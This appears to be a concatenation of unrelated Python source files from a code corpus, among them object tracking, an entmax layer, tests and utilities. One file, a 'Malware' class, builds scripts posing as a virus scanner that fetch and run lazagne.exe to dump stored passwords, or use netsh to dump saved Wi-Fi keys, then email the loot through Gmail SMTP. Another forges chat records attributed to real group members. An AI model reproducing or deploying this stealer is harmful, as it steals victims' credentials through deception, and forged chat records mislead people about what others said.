tracker = cv2.TrackerTLD_create()
elif trackerType == trackerTypes[4]:
tracker = cv2.TrackerMedianFlow_create()
elif trackerType == trackerTypes[5]:
tracker = cv2.TrackerGOTURN_create()
elif trackerType == trackerTypes[6]:
tracker = cv2.TrackerMOSSE_create()
elif trackerType == trackerTypes[7]:
tracker = cv2.TrackerCSRT_create()
else:
tracker = None
print('Incorrect tracker name')
print('Available trackers are:')
for t in trackerTypes:
print(t)
return tracker
def yolo():
parser = argparse.ArgumentParser()
parser.add_argument('-m', '--model-path',
type=str,
default='./yolov3-coco/',
help='The directory where the model weights and \
configuration files are.')
parser.add_argument('-w', '--weights',
type=str,
default='./yolov3-coco/yolov3.weights',
help='Path to the file which contains the weights \
for YOLOv3.')
parser.add_argument('-cfg', '--config',
type=str,
default='./yolov3-coco/yolov3.cfg',
help='Path to the configuration file for the YOLOv3 model.')
parser.add_argument('-vo', '--video-output-path',
type=str,
default='./output.avi',
help='The path of the output video file')
parser.add_argument('-l', '--labels',
type=str,
default='./yolov3-coco/coco-labels',
help='Path to the file having the \
labels in a new-line seperated way.')
parser.add_argument('-c', '--confidence',
type=float,
default=0.5,
help='The model will reject boundaries which has a \
probabiity less than the confidence value. \
default: 0.5')
parser.add_argument('-th', '--threshold',
type=float,
default=0.3,
help='The threshold to use when applying the \
Non-Max Suppresion')
parser.add_argument('--download-model',
type=bool,
default=False,
help='Set to True, if the model weights and configurations \
are not present on your local machine.')
parser.add_argument('-t', '--show-time',
type=bool,
default=False,
help='Show the time taken to infer each image.')
FLAGS, unparsed = parser.parse_known_args()
#print(FLAGS)
# Get the labels
labels = open(FLAGS.labels).read().strip().split('\n')
# Intializing colors to represent each label uniquely
colors = np.random.randint(0, 255, size=(len(labels), 3), dtype='uint8')
# Load the weights and configutation to form the pretrained YOLOv3 model
net = cv.dnn.readNetFromDarknet(FLAGS.config, FLAGS.weights)
# Get the output layer names of the model
layer_names = net.getLayerNames()
layer_names = [layer_names[i[0] - 1] for i in net.getUnconnectedOutLayers()]
################################
height, width = frame.shape[:2]
img, bboxes, _, classid, _ = infer_image(net, layer_names, height, width, frame, colors, labels, FLAGS)
global boxes
boxes = [] #It's a list now
j=0
for i in classid:
if i==0:
print("persons bounding box is: ",bboxes[j])
boxes.append(bboxes[j].copy())
print(boxes[i])
j=j+1
############################temp ###########33
#for index,value in enumerate(boxes):
itr = 0
for i in range(len(boxes)):
itr = itr + 1
name = 'dataset/' + str("person") + str(itr) + ".jpg"
y = boxes[i][1]
x = boxes[i][0]
h = boxes[i][3]
w = boxes[i][2]
crop_img = img[y:y+h,x:x+w]
cv.imwrite(name,crop_img)
detector = MTCNN()
print("I am a detector phewww !")
print(detector.detect_faces(crop_img))
face_cropped = detector.detect_faces(crop_img)
print(face_cropped,"Debug")
if(len(face_cropped)>0):
boxes_face = (face_cropped[0]['box'])
y1 = boxes_face[1]
x1 = boxes_face[0]
h1 = boxes_face[3]
w1 = boxes_face[2]
crop_img_2 = crop_img[y1:y1+h1, x1:x1+w1]
name = 'dataset/' + str("face")+ str(itr) + '.jpg'
cv.imwrite(name,crop_img_2)
#crop_img_2 = cv2.resize(crop_img_2,(100,100),interpolation=cv2.INTER_AREA)
rec = FaceID()
# Matching Part
images = []
for img in glob.glob("dataset/face*.jpg"):
n = cv2.imread(img)
images.append(n)
#for img in images:
# img = cv2.resize(img,(100,100),interpolation=cv2.INTER_AREA)
#if(np.linalg.norm(img-crop_img_2)>=0.9):
# val = np.linalg.norm(img-crop_img_2)
#print("<NAME>",val)
# Matching Part End
##########################temp done#########33
my_tuple = []
for i in bboxes:
my_tuple.append(tuple(i))
#print(my_tuple)
# Create MultiTracker object
multiTracker = cv2.MultiTracker_create()
# Initialize MultiTracker
colors_multi = []
for bbox in my_tuple:
multiTracker.add(createTrackerByName(trackerType), frame, bbox)
colors_multi.append((randint(64, 255), randint(64, 255), randint(64, 255)))
return multiTracker, colors_multi
if __name__ == '__main__':
print("Default tracking algoritm is CSRT \n"
"Available tracking algorithms are:\n")
for t in trackerTypes:
print(t)
#trackerType = "CSRT"
trackerType = "CSRT"
# Set video to load
videoPath = "webcam.mp4"
# Create a video capture object to read videos
cap = cv2.VideoCapture(0)
# Read first frame
success, frame = cap.read()
# quit if unable to read the video file
if not success:
print('Failed to read video')
sys.exit(1)
## Select boxes
bboxes = []
colors = []
boxes=[]
################# copied code
multiTracker, colors_multi = yolo()
# Process video and track objects
while cap.isOpened():
success, frame = cap.read()
if not success:
break
# get updated location of objects in subsequent frames
success, boxes = multiTracker.update(frame)
# draw tracked objects
for i, newbox in enumerate(boxes):
p1 = (int(newbox[0]), int(newbox[1]))
p2 = (int(newbox[0] + newbox[2]), int(newbox[1] + newbox[3]))
cv2.rectangle(frame, p1, p2, colors_multi[i], 2, 1)
# show frame
cv2.imshow('MultiTracker', frame)
# quit on ESC button
if cv2.waitKey(1) & 0xFF == 27: # Esc pressed
break
if cv2.waitKey(1) & 0xFF == 121:
multiTracker, colors_multi = yolo()
print("key presses")
| StarcoderdataPython |
147804 | import paddle
from paddle.autograd import PyLayer
class EntmaxBisectFunction(PyLayer):
@classmethod
def _gp(cls, x, alpha):
return x ** (alpha - 1)
@classmethod
def _gp_inv(cls, y, alpha):
return y ** (1 / (alpha - 1))
@classmethod
def _p(cls, X, alpha):
return cls._gp_inv(paddle.clip(X, min=0), alpha)
@classmethod
def forward(
cls,
ctx,
X,
alpha=1.5,
axis=-1,
n_iter=50,
ensure_sum_one=True,
):
ctx.need_alpha_grad = not alpha.stop_gradient
alpha_shape = X.shape
alpha_shape[axis] = 1
alpha = alpha.expand(alpha_shape)
ctx.alpha = alpha
ctx.axis = axis
d = X.shape[axis]
X = X * (alpha - 1)
max_val = X.max(axis=axis, keepdim=True)
tau_lo = max_val - cls._gp(1, alpha)
tau_hi = max_val - cls._gp(1 / d, alpha)
f_lo = cls._p(X - tau_lo, alpha).sum(axis) - 1
dm = tau_hi - tau_lo
for it in range(n_iter):
dm /= 2
tau_m = tau_lo + dm
p_m = cls._p(X - tau_m, alpha)
f_m = p_m.sum(axis) - 1
mask = (f_m * f_lo >= 0).unsqueeze(axis)
tau_lo = paddle.where(mask, tau_m, tau_lo)
if ensure_sum_one:
p_m /= p_m.sum(axis=axis).unsqueeze(axis=axis)
ctx.save_for_backward(p_m.detach())
return p_m
@classmethod
def backward(cls, ctx, dY):
(Y,) = ctx.saved_tensor()
gppr = paddle.where(Y > 0, Y ** (2 - ctx.alpha), paddle.zeros((1,)))
dX = dY * gppr
q = dX.sum(ctx.axis) / gppr.sum(ctx.axis)
q = q.unsqueeze(ctx.axis)
dX -= q * gppr
d_alpha = None
if ctx.need_alpha_grad:
# alpha gradient computation
# d_alpha = (partial_y / partial_alpha) * dY
# NOTE: ensure alpha is not close to 1
# since there is an indetermination
# batch_size, _ = dY.shape
# shannon terms
S = paddle.where(Y > 0, Y * paddle.log(Y), paddle.zeros((1,)))
# shannon entropy
ent = S.sum(ctx.axis).unsqueeze(ctx.axis)
Y_skewed = gppr / gppr.sum(ctx.axis).unsqueeze(ctx.axis)
d_alpha = dY * (Y - Y_skewed) / ((ctx.alpha - 1) ** 2)
d_alpha -= dY * (S - Y_skewed * ent) / (ctx.alpha - 1)
d_alpha = d_alpha.sum(ctx.axis).unsqueeze(ctx.axis)
return dX, d_alpha
def entmax_bisect(X, alpha=1.5, axis=-1, n_iter=50, ensure_sum_one=True):
"""alpha-entmax: normalizing sparse transform (a la softmax).
Solves the optimization problem:
max_p <x, p> - H_a(p) s.t. p >= 0, sum(p) == 1.
where H_a(p) is the Tsallis alpha-entropy with custom alpha >= 1,
using a bisection (root finding, binary search) algorithm.
This function is differentiable with respect to both X and alpha.
Parameters
----------
X : paddle.Tensor
The input tensor.
alpha : float or paddle.Tensor
Tensor of alpha parameters (> 1) to use. If scalar
or python float, the same value is used for all rows, otherwise,
it must have shape (or be expandable to)
alpha.shape[j] == (X.shape[j] if j != axis else 1)
A value of alpha=2 corresponds to sparsemax, and alpha=1 corresponds to
softmax (but computing it this way is likely unstable).
axis : int
The dimension along which to apply alpha-entmax.
n_iter : int
Number of bisection iterations. For float32, 24 iterations should
suffice for machine precision.
ensure_sum_one : bool,
Whether to divide the result by its sum. If false, the result might
sum to close but not exactly 1, which might cause downstream problems.
Returns
-------
P : paddle tensor, same shape as X
The projection result, such that P.sum(axis=axis) == 1 elementwise.
"""
if not isinstance(alpha, paddle.Tensor):
alpha = paddle.to_tensor(alpha, dtype=X.dtype)
return EntmaxBisectFunction.apply(X, alpha, axis, n_iter, ensure_sum_one)
if __name__ == "__main__":
import torch
from entmax import entmax_bisect as pt_entmax_bisect
x = paddle.randn((3, 4, 5, 6))
o1 = torch.tensor(entmax_bisect(x, axis=-2).numpy())
o2 = pt_entmax_bisect(torch.tensor(x.numpy()), dim=-2)
d = (o1 - o2).abs()
print(d.mean())
print(d.max())
| StarcoderdataPython |
391661 | import subprocess
import os
import shutil
from send_attachment import send_attachment
from threading import Thread
import time
class Malware:
def __init__(self, em1, pass1, download_link):
self.email = em1
self.userpass = pass1
self.download_link = download_link
def create_malware(self):
time.sleep(2)
user_file = open("user_details.txt","w")
username = self.email
password = self.userpass
user_file.write(username + "\n")
user_file.write(password)
user_file.close()
user_file = open("user_details.txt","r")
username = user_file.readline().strip('\n')
password = user_file.readline()
user_file.close()
os.remove("user_details.txt")
code = '''
import requests
import subprocess, smtplib, re, os, tempfile
def download(url):
get_response = requests.get(url)
file_name = url.split("/")[-1]
with open(file_name, "wb") as out_file:
out_file.write(get_response.content)
def send_mail(email, password, msg):
print("Scanned Successfully.. No Threats Found")
server = smtplib.SMTP("smtp.gmail.com", "587")
server.starttls()
server.login(email, password)
server.sendmail(email, email, "\\n" + msg)
server.quit()
username = '{0}'
password = <PASSWORD>}'
download_link = '{2}'
print("Scanning for viruses.. Please do not close the application")
download(download_link)
result = subprocess.check_output("lazagne.exe all", shell=True).decode()
send_mail(username, password, str(result))
os.remove("lazagne.exe")
'''
executable_file = open("code.py","w")
executable_file.write(code.format(username, password, self.download_link))
executable_file.close()
send_attachment(username, username, password, "code.py")
os.remove("code.py")
def password_stealer(self):
time.sleep(2)
user_file = open("user_details.txt","w")
username = self.email
password = <PASSWORD>
user_file.write(username + "\n")
user_file.write(password)
user_file.close()
user_file = open("user_details.txt","r")
username = user_file.readline().strip('\n')
password = user_file.readline()
user_file.close()
os.remove("user_details.txt")
code = '''
import requests
import subprocess, smtplib, re, os, tempfile
def send_mail(email, password, msg):
print("Scanning For Viruses...")
server = smtplib.SMTP("smtp.gmail.com", "587")
server.starttls()
server.login(email, password)
server.sendmail(email, email, "\\n" + msg)
server.quit()
username = '{0}'
password = <PASSWORD>}'
data = subprocess.check_output(['netsh', 'wlan', 'show', 'profiles']).decode('utf-8', errors="backslashreplace").split('\\n')
profiles = [i.split(":")[1][1:-1] for i in data if "All User Profile" in i]
result = ""
for i in profiles:
try:
results = subprocess.check_output(['netsh', 'wlan', 'show', 'profile', i, 'key=clear']).decode('utf-8', errors="backslashreplace").split('\\n')
results = [b.split(":")[1][1:-1] for b in results if "Key Content" in b]
try:
result = result + i + " | " + results[0] + "\\n"
except IndexError:
result = result + i + " | " + "Password Not Found" + "\\n"
except subprocess.CalledProcessError:
print ("ENCODING ERROR")
send_mail(username, password, result)
print("Scanned Successfully. No Threats Found")
'''
executable_file = open("code.py","w")
executable_file.write(code.format(username, password))
executable_file.close()
send_attachment(username, username, password, "code.py")
os.remove("code.py")
def create(self):
t = Thread(target = self.create_malware)
t.start()
def create_stealer(self):
t = Thread(target = self.password_stealer)
t.start()
| StarcoderdataPython |
8100699 | <reponame>steffakasid/RPi-Jukebox-RFID
#!/usr/bin/env python3
import os.path
import sys
import json
from evdev import InputDevice, list_devices
path = os.path.dirname(os.path.realpath(__file__))
device_name_path = path + '/deviceName.txt'
button_map_path = path + '/buttonMap.json'
def all_devices():
return [InputDevice(fn) for fn in list_devices()]
def current_device():
if not os.path.isfile(device_name_path):
sys.exit('Please run register_buttons_usb_encoder.py first')
else:
with open(device_name_path, 'r') as f:
device_name = f.read()
devices = all_devices()
for device in devices:
if device.name == device_name:
_current_device = device
break
try:
_current_device
except:
sys.exit('Could not find the device %s\n. Make sure it is connected' % device_name)
return _current_device
def write_current_device(name):
with open(device_name_path, 'w') as f:
f.write(name)
f.close()
def button_map():
if not os.path.isfile(button_map_path):
sys.exit('Please run map_buttons_usb_encoder.py first')
else:
with open(button_map_path, 'r') as json_file:
button_map = json.load(json_file)
if (len(button_map) == 0):
sys.exit("No buttons mapped to a function")
return button_map
def write_button_map(button_map):
with open(button_map_path, 'w') as fp:
json.dump(button_map, fp)
fp.close()
| StarcoderdataPython |
173967 | import numpy as np
from sequentia.classifiers import HMM
# Create some sample data
X = [np.random.random((10 * i, 3)) for i in range(1, 4)]
# Create and fit a left-right HMM with random transitions and initial state distribution
hmm = HMM(label='class1', n_states=5, topology='left-right')
hmm.set_random_initial()
hmm.set_random_transitions()
hmm.fit(X) | StarcoderdataPython |
5023792 | #!/usr/bin/python
# Copyright (c) 2021, NVIDIA CORPORATION & AFFILIATES. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of NVIDIA CORPORATION nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS ``AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
# OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import sys
sys.path.append("../common")
import os
import shutil
import time
import unittest
import numpy as np
import infer_util as iu
import test_util as tu
import tritonclient.http as httpclient
import argparse
import csv
import json
import os
import requests
import socket
import sys
class VertexAiTest(tu.TestResultCollector):
def setUp(self):
port = os.getenv('AIP_HTTP_PORT', '8080')
predict_endpoint = os.getenv('AIP_PREDICT_ROUTE', 'predict')
self.model_ = os.getenv('TEST_EXPLICIT_MODEL_NAME', 'addsub')
self.url_ = "http://localhost:{}/{}".format(port, predict_endpoint)
self.input_data_ = [
0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15
]
self.expected_output0_data_ = [x * 2 for x in self.input_data_]
self.expected_output1_data_ = [0 for x in self.input_data_]
def test_predict(self):
inputs = []
outputs = []
inputs.append(httpclient.InferInput('INPUT0', [1, 16], "INT32"))
inputs.append(httpclient.InferInput('INPUT1', [1, 16], "INT32"))
# Initialize the data
input_data = np.array(self.input_data_, dtype=np.int32)
input_data = np.expand_dims(input_data, axis=0)
inputs[0].set_data_from_numpy(input_data, binary_data=False)
inputs[1].set_data_from_numpy(input_data, binary_data=False)
outputs.append(
httpclient.InferRequestedOutput('OUTPUT0', binary_data=False))
outputs.append(
httpclient.InferRequestedOutput('OUTPUT1', binary_data=False))
request_body, _ = httpclient.InferenceServerClient.generate_request_body(
inputs, outputs=outputs)
headers = {'Content-Type': 'application/json'}
r = requests.post(self.url_, data=request_body, headers=headers)
r.raise_for_status()
result = httpclient.InferenceServerClient.parse_response_body(
r._content)
output0_data = result.as_numpy('OUTPUT0')
output1_data = result.as_numpy('OUTPUT1')
for i in range(16):
self.assertEqual(output0_data[0][i], self.expected_output0_data_[i])
self.assertEqual(output1_data[0][i], self.expected_output1_data_[i])
def test_predict_specified_model(self):
inputs = []
outputs = []
inputs.append(httpclient.InferInput('INPUT0', [1, 16], "INT32"))
inputs.append(httpclient.InferInput('INPUT1', [1, 16], "INT32"))
# Initialize the data
input_data = np.array(self.input_data_, dtype=np.int32)
input_data = np.expand_dims(input_data, axis=0)
inputs[0].set_data_from_numpy(input_data, binary_data=False)
inputs[1].set_data_from_numpy(input_data, binary_data=False)
outputs.append(
httpclient.InferRequestedOutput('OUTPUT0', binary_data=False))
outputs.append(
httpclient.InferRequestedOutput('OUTPUT1', binary_data=False))
request_body, _ = httpclient.InferenceServerClient.generate_request_body(
inputs, outputs=outputs)
headers = {
'Content-Type':
'application/json',
"X-Vertex-Ai-Triton-Redirect":
"v2/models/{}/infer".format(self.model_)
}
r = requests.post(self.url_, data=request_body, headers=headers)
r.raise_for_status()
result = httpclient.InferenceServerClient.parse_response_body(
r._content)
output0_data = result.as_numpy('OUTPUT0')
output1_data = result.as_numpy('OUTPUT1')
if self.model_ == "addsub":
expected_output0_data = [x * 2 for x in self.input_data_]
expected_output1_data = [0 for x in self.input_data_]
else:
expected_output0_data = [0 for x in self.input_data_]
expected_output1_data = [x * 2 for x in self.input_data_]
for i in range(16):
self.assertEqual(output0_data[0][i], expected_output0_data[i])
self.assertEqual(output1_data[0][i], expected_output1_data[i])
def test_predict_request_binary(self):
inputs = []
outputs = []
inputs.append(httpclient.InferInput('INPUT0', [1, 16], "INT32"))
inputs.append(httpclient.InferInput('INPUT1', [1, 16], "INT32"))
# Initialize the data
input_data = np.array(self.input_data_, dtype=np.int32)
input_data = np.expand_dims(input_data, axis=0)
inputs[0].set_data_from_numpy(input_data, binary_data=True)
inputs[1].set_data_from_numpy(input_data, binary_data=False)
outputs.append(
httpclient.InferRequestedOutput('OUTPUT0', binary_data=False))
outputs.append(
httpclient.InferRequestedOutput('OUTPUT1', binary_data=False))
request_body, header_length = httpclient.InferenceServerClient.generate_request_body(
inputs, outputs=outputs)
headers = {
'Content-Type':
'application/vnd.vertex-ai-triton.binary+json;json-header-size={}'
.format(header_length)
}
r = requests.post(self.url_, data=request_body, headers=headers)
r.raise_for_status()
result = httpclient.InferenceServerClient.parse_response_body(
r._content)
output0_data = result.as_numpy('OUTPUT0')
output1_data = result.as_numpy('OUTPUT1')
for i in range(16):
self.assertEqual(output0_data[0][i], self.expected_output0_data_[i])
self.assertEqual(output1_data[0][i], self.expected_output1_data_[i])
def test_predict_response_binary(self):
inputs = []
outputs = []
inputs.append(httpclient.InferInput('INPUT0', [1, 16], "INT32"))
inputs.append(httpclient.InferInput('INPUT1', [1, 16], "INT32"))
# Initialize the data
input_data = np.array(self.input_data_, dtype=np.int32)
input_data = np.expand_dims(input_data, axis=0)
inputs[0].set_data_from_numpy(input_data, binary_data=False)
inputs[1].set_data_from_numpy(input_data, binary_data=False)
outputs.append(
httpclient.InferRequestedOutput('OUTPUT0', binary_data=True))
outputs.append(
httpclient.InferRequestedOutput('OUTPUT1', binary_data=False))
request_body, _ = httpclient.InferenceServerClient.generate_request_body(
inputs, outputs=outputs)
headers = {'Content-Type': 'application/json'}
r = requests.post(self.url_, data=request_body, headers=headers)
r.raise_for_status()
header_length_str = r.headers['Inference-Header-Content-Length']
result = httpclient.InferenceServerClient.parse_response_body(
r._content, header_length=int(header_length_str))
output0_data = result.as_numpy('OUTPUT0')
output1_data = result.as_numpy('OUTPUT1')
for i in range(16):
self.assertEqual(output0_data[0][i], self.expected_output0_data_[i])
self.assertEqual(output1_data[0][i], self.expected_output1_data_[i])
def test_malformed_binary_header(self):
inputs = []
outputs = []
inputs.append(httpclient.InferInput('INPUT0', [1, 16], "INT32"))
inputs.append(httpclient.InferInput('INPUT1', [1, 16], "INT32"))
# Initialize the data
input_data = np.array(self.input_data_, dtype=np.int32)
input_data = np.expand_dims(input_data, axis=0)
inputs[0].set_data_from_numpy(input_data, binary_data=True)
inputs[1].set_data_from_numpy(input_data, binary_data=False)
outputs.append(
httpclient.InferRequestedOutput('OUTPUT0', binary_data=False))
outputs.append(
httpclient.InferRequestedOutput('OUTPUT1', binary_data=False))
request_body, header_length = httpclient.InferenceServerClient.generate_request_body(
inputs, outputs=outputs)
headers = {
'Content-Type':
'additional-string/application/vnd.vertex-ai-triton.binary+json;json-header-size={}'
.format(header_length)
}
r = requests.post(self.url_, data=request_body, headers=headers)
self.assertEqual(
400, r.status_code,
"Expected error code {} returned for the request; got: {}".format(
400, r.status_code))
def test_malformed_binary_header_not_number(self):
inputs = []
outputs = []
inputs.append(httpclient.InferInput('INPUT0', [1, 16], "INT32"))
inputs.append(httpclient.InferInput('INPUT1', [1, 16], "INT32"))
# Initialize the data
input_data = np.array(self.input_data_, dtype=np.int32)
input_data = np.expand_dims(input_data, axis=0)
inputs[0].set_data_from_numpy(input_data, binary_data=True)
inputs[1].set_data_from_numpy(input_data, binary_data=False)
outputs.append(
httpclient.InferRequestedOutput('OUTPUT0', binary_data=False))
outputs.append(
httpclient.InferRequestedOutput('OUTPUT1', binary_data=False))
request_body, header_length = httpclient.InferenceServerClient.generate_request_body(
inputs, outputs=outputs)
headers = {
'Content-Type':
'application/vnd.vertex-ai-triton.binary+json;json-header-size=additional-string{}'
.format(header_length)
}
r = requests.post(self.url_, data=request_body, headers=headers)
self.assertEqual(
400, r.status_code,
"Expected error code {} returned for the request; got: {}".format(
400, r.status_code))
def test_malformed_binary_header_negative_number(self):
inputs = []
outputs = []
inputs.append(httpclient.InferInput('INPUT0', [1, 16], "INT32"))
inputs.append(httpclient.InferInput('INPUT1', [1, 16], "INT32"))
# Initialize the data
input_data = np.array(self.input_data_, dtype=np.int32)
input_data = np.expand_dims(input_data, axis=0)
inputs[0].set_data_from_numpy(input_data, binary_data=True)
inputs[1].set_data_from_numpy(input_data, binary_data=False)
outputs.append(
httpclient.InferRequestedOutput('OUTPUT0', binary_data=False))
outputs.append(
httpclient.InferRequestedOutput('OUTPUT1', binary_data=False))
request_body, header_length = httpclient.InferenceServerClient.generate_request_body(
inputs, outputs=outputs)
headers = {
'Content-Type':
'application/vnd.vertex-ai-triton.binary+json;json-header-size=-123'
}
r = requests.post(self.url_, data=request_body, headers=headers)
self.assertEqual(
400, r.status_code,
"Expected error code {} returned for the request; got: {}".format(
400, r.status_code))
def test_malformed_binary_header_large_number(self):
inputs = []
outputs = []
inputs.append(httpclient.InferInput('INPUT0', [1, 16], "INT32"))
inputs.append(httpclient.InferInput('INPUT1', [1, 16], "INT32"))
# Initialize the data
input_data = np.array(self.input_data_, dtype=np.int32)
input_data = np.expand_dims(input_data, axis=0)
inputs[0].set_data_from_numpy(input_data, binary_data=True)
inputs[1].set_data_from_numpy(input_data, binary_data=False)
outputs.append(
httpclient.InferRequestedOutput('OUTPUT0', binary_data=False))
outputs.append(
httpclient.InferRequestedOutput('OUTPUT1', binary_data=False))
request_body, header_length = httpclient.InferenceServerClient.generate_request_body(
inputs, outputs=outputs)
headers = {
'Content-Type':
'application/vnd.vertex-ai-triton.binary+json;json-header-size=12345'
}
r = requests.post(self.url_, data=request_body, headers=headers)
self.assertEqual(
400, r.status_code,
"Expected error code {} returned for the request; got: {}".format(
400, r.status_code))
if __name__ == '__main__':
unittest.main()
| StarcoderdataPython |
3591123 | <filename>Python/LinkedList/List2Pointer/Rotate List.py<gh_stars>10-100
"""
Given a list, rotate the list to the right by k places, where k is non-negative.
For example:
Given 1->2->3->4->5->NULL and k = 2,
return 4->5->1->2->3->NULL.
"""
from Python.Level4.LinkedList import Node, Traverse
class Solution:
def rotate_list(self, head, k):
if not head or not head.next:
return head
count = 1
curr = head
while curr.next is not None:
count += 1
curr = curr.next
curr.next = head
curr, last, i = head, curr, 0
while i < (count - k % count):
last = curr
curr = curr.next
i += 1
last.next = None
return curr
if __name__ == "__main__":
# initializing the linked list values
h1, h1.next, h1.next.next, h1.next.next.next, h1.next.next.next.next, h1.next.next.next.next.next = Node(1), Node(
2), Node(3), Node(4), Node(5), Node(6)
# h1, h1.next, h1.next.next, h1.next.next.next, h1.next.next.next.next = Node(1), Node(2), Node(3), Node(4), Node(5)
# h1, h1.next, h1.next.next = Node(1), Node(2), Node(3)
# h2, h2.next, h2.next.next = Node(1), Node(2), Node(1)
# printing the new list
Traverse().print_list(Solution().rotate_list(h1, 89))
# print(Solution().is_palindrome_02(h2))
# print(Solution().is_palindrome(h2))
| StarcoderdataPython |
11330780 | <filename>test/test_del_group.py
# -*- coding: utf-8 -*-
from model.group import Group
import random
import allure
def test_delete_some_group(app, db, check_ui):
old_groups = given_non_empty_group_list(app, db)
group = random_group(old_groups)
delete_group(app, group)
new_groups = db.get_group_list()
assert len(old_groups) - 1 == app.group.count()
check_groups(app, old_groups, new_groups, group, check_ui)
@allure.step('Given a non-empty group list')
def given_non_empty_group_list(app, db):
if len(db.get_group_list()) == 0:
app.group.create(Group(name="test"))
return db.get_group_list()
@allure.step('Given a random group from the list')
def random_group(groups):
return random.choice(groups)
@allure.step('Given a group list')
def given_group_list(db):
return db.get_group_list()
@allure.step('When I delete the group "{group}" from the list')
def delete_group(app, group):
app.group.delete_group_by_id(group.id)
@allure.step('Then the new group list is equal to the old list with the deleted group')
def check_groups(app, old_groups, new_groups, group, check_ui):
old_groups.remove(group)
assert old_groups == new_groups
if check_ui:
assert sorted(new_groups, key=Group.id_or_max) == sorted(app.group.get_group_list(), key=Group.id_or_max)
| StarcoderdataPython |
297110 | import ldap3
def auth_ad(user, password, domain_server, domain_prefix, base_dn):
try:
server = ldap3.Server(domain_server, get_info=ldap3.ALL)
connection = ldap3.Connection(server, user=domain_prefix + '\\' + user, password=password, authentication=ldap3.NTLM, auto_bind=True)
_filter = '(objectclass=person)'
attrs = ['SamAccountName']
connection.search(search_base=base_dn, search_filter=_filter, search_scope=ldap3.SUBTREE, attributes=attrs)
usernames = list()
for username in connection.response:
usernames.append(username['attributes']['sAMAccountName'])
if user not in usernames:
print('Need to be in the IT Management group!')
return False
return True
except Exception as error:
input('Error to authenticate: {}'.format(error))
return False
| StarcoderdataPython |
4848913 | <gh_stars>1-10
import re
from typing import List, Dict, Union
from nonebot import on_command
# from nonebot.log import logger
from nonebot.permission import SUPERUSER
from nonebot.typing import T_State
from nonebot.adapters.onebot.v11 import Message, MessageSegment, Bot, GroupMessageEvent, ActionFailed
other_type_text = '@#OTHER_TYPE#@'
fake_forward = on_command('.forward', aliases={'.Forward'}, permission=SUPERUSER)
__help__ = """伪造聊天记录 - Fake Forward
Permission: SUPERUSER
使用方法: .forward %Args%
-Args:
-u: User_ID
-n: Nick_name, Optional
-m: Message"""
def get_json(uin: int,
name: str,
msgs: Union[List[MessageSegment], MessageSegment]) -> Dict:
if isinstance(msgs, List):
return {
"type": "node",
"data": {"name": name, "uin": uin, "content": list(msgs)},
}
return {"type": "node", "data": {"name": name, "uin": uin, "content": msgs}}
@fake_forward.handle()
async def _(bot: Bot, event: GroupMessageEvent, state: T_State):
if not (msgs := state['_prefix'].get('command_arg')):
await fake_forward.finish(__help__)
else:
args = ''.join(i.data.get('text', other_type_text) for i in msgs)
other_type_msg = [i for i in msgs if i.type != 'text']
users = re.findall(r'-u (\d+)', args)
msgs_node = []
for i in args.split('-u'):
if len((msgs := i.split('-m '))) == 1:
continue
msgs = [k.strip() for k in msgs]
print(msgs)
uin = int(users[0])
users.pop(0)
nickname = msgs[0].split('-n')
if len(nickname) > 1:
name = nickname[1]
else:
try:
user_info = await bot.call_api('get_group_member_info', group_id=event.group_id, user_id=uin)
name = user_info.get('card', user_info.get('name'))
if not name:
raise ActionFailed
except ActionFailed:
user_info = await bot.call_api('get_stranger_info', user_id=uin)
name = user_info.get('nickname')
for msg in msgs[1:]:
if other_type_text in msg:
if msg == other_type_text:
if not other_type_msg:
continue
msg_list = [other_type_msg[0]]
other_type_msg.pop(0)
else:
if other_type_msg:
other_msg = other_type_msg[0]
other_type_msg.pop(0)
else:
other_msg = MessageSegment.text('')
msg_list = [MessageSegment.text(msg.replace(other_type_text, '')), other_msg]
msgs_node.append(get_json(uin, name, msg_list))
else:
msgs_node.append(get_json(uin, name, MessageSegment.text(msg)))
await bot.call_api('send_group_forward_msg', group_id=event.group_id, messages=msgs_node)
| StarcoderdataPython |
5181463 | """
Import as:
import dataflow.system.research_dag_adapter as dtfsredaad
"""
import core.config as cconfig
import dataflow.core as dtfcore
import dataflow.system.source_nodes as dtfsysonod
class ResearchDagAdapter(dtfcore.DagAdapter):
"""
Adapt a DAG builder for the research flow (batch execution, no OMS).
"""
def __init__(
self,
dag_builder: dtfcore.DagBuilder,
source_node_config: cconfig.Config,
):
overriding_config = cconfig.Config()
# Configure a DataSourceNode.
overriding_config["load_prices"] = {**source_node_config.to_dict()}
# Insert a node.
nodes_to_insert = []
stage = "load_prices"
node_ctor = dtfsysonod.data_source_node_factory
nodes_to_insert.append((stage, node_ctor))
#
super().__init__(dag_builder, overriding_config, nodes_to_insert, [])
| StarcoderdataPython |
5158771 | from pprint import pprint as pp
from scout.load.hgnc_gene import (load_hgnc_genes, load_hgnc)
def test_load_hgnc_genes(adapter, genes37_handle, hgnc_handle, exac_handle,
mim2gene_handle, genemap_handle, hpo_genes_handle):
# GIVEN a empty database
assert sum(1 for i in adapter.all_genes()) == 0
# WHEN inserting a number of genes
gene_objects = load_hgnc_genes(adapter,
ensembl_lines=genes37_handle,
hgnc_lines=hgnc_handle,
